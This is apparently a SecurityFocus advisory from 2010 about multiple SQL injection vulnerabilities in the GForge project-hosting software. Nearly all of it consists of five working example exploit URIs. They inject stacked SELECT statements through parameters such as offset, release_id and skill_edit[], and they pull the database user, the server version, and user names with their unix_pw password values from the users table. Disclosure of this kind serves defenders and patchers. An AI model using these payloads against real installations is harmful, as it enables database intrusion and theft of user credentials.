GForge Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
http://www.example.com/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
http://www.example.com/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;
http://www.example.com/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*
http://www.example.com/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit


 

Privacy Statement
Copyright 2010, SecurityFocus